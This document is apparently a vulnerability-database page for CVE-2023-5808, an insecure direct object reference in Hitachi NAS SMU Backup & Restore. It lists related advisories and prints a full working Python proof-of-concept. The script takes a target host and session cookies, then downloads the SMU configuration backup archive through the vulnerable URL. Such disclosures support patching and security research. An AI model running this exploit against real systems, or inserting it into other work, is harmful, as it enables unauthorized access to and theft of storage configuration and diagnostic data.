Hitachi NAS SMU Backup And Restore Insecure Direct Object Reference

🗓️ 11 Mar 2024 00:00:00Reported by Arslan MasoodType

packetstorm🔗 packetstormsecurity.com👁 373 Views

Hitachi NAS (HNAS) SMU Backup & Restore IDOR Vulnerability Exploit 2023-12-1

Reporter	Title	Published	Views	Family All 14
0day.today	Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 IDOR Exploit	11 Mar 202400:00	–	zdt
GithubExploit	Exploit for Improper Authorization in Hitachi System_Management_Unit_Firmware	18 Dec 202309:29	–	githubexploit
GithubExploit	Exploit for Improper Authentication in Hitachi Vantara_Hitachi_Network_Attached_Storage	18 Dec 202309:24	–	githubexploit
Circl	CVE-2023-5808	20 Dec 202315:44	–	circl
CNNVD	Hitachi Vantara HNAS Authorization Issues Vulnerability	4 Dec 202300:00	–	cnnvd
CVE	CVE-2023-5808	4 Dec 202323:53	–	cve
Cvelist	CVE-2023-5808 System Management Unit (SMU) versions prior to 14.8.7825.01, used to manage Hitachi Vantara NAS products are susceptible to unintended information disclosure via unprivileged access to HNAS configuration backup and diagnostic data.	4 Dec 202323:53	–	cvelist
Exploit DB	Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR	11 Mar 202400:00	–	exploitdb
EUVD	EUVD-2023-58091	3 Oct 202520:07	–	euvd
NVD	CVE-2023-5808	5 Dec 202300:15	–	nvd

`#!/usr/bin/python3  
#  
# Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability   
# CVE: CVE-2023-5808  
# Date: 2023-12-13  
# Exploit Author: Arslan Masood (@arszilla)  
# Vendor: https://www.hitachivantara.com/  
# Version: < 14.8.7825.01  
# Tested On: 13.9.7021.04   
  
import argparse  
from datetime import datetime  
from os import getcwd  
  
import requests  
  
parser = argparse.ArgumentParser(  
description="CVE-2023-5808 PoC",  
usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"  
)  
  
# Create --host argument:  
parser.add_argument(  
"--host",  
required=True,  
type=str,  
help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"  
)  
  
# Create --id argument:  
parser.add_argument(  
"--id",  
required=True,  
type=str,  
help="JSESSIONID cookie value"  
)  
  
# Create --sso argument:  
parser.add_argument(  
"--sso",  
required=True,  
type=str,  
help="JSESSIONIDSSO cookie value"  
)  
  
args = parser.parse_args()  
  
def download_file(hostname, jsessionid, jsessionidsso):  
# Set the filename:  
filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"  
  
# Vulnerable SMU URL:  
smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"  
  
# GET request cookies  
smu_cookies = {  
"JSESSIONID": jsessionid,  
"JSESSIONIDSSO": jsessionidsso  
}  
  
# GET request headers:  
smu_headers = {  
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",  
"Accept-Language": "en-US,en;q=0.5",  
"Accept-Encoding": "gzip, deflate",  
"Dnt": "1",  
"Referer": f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",  
"Upgrade-Insecure-Requests": "1",  
"Sec-Fetch-Dest": "document",  
"Sec-Fetch-Mode": "navigate",  
"Sec-Fetch-Site": "same-origin",  
"Sec-Fetch-User": "?1",  
"Te": "trailers",  
"Connection": "close"  
}  
  
# Send the request:  
with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:  
with open(filename, 'wb') as backup_archive:  
# Write the zip file to the CWD:  
backup_archive.write(file_download.content)  
  
print(f"{filename} has been downloaded to {getcwd()}")  
  
if __name__ == "__main__":  
download_file(args.host, args.id, args.sso)  
  
  
`

11 Mar 2024 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.16.5 - 7.6

EPSS0.00293

SSVC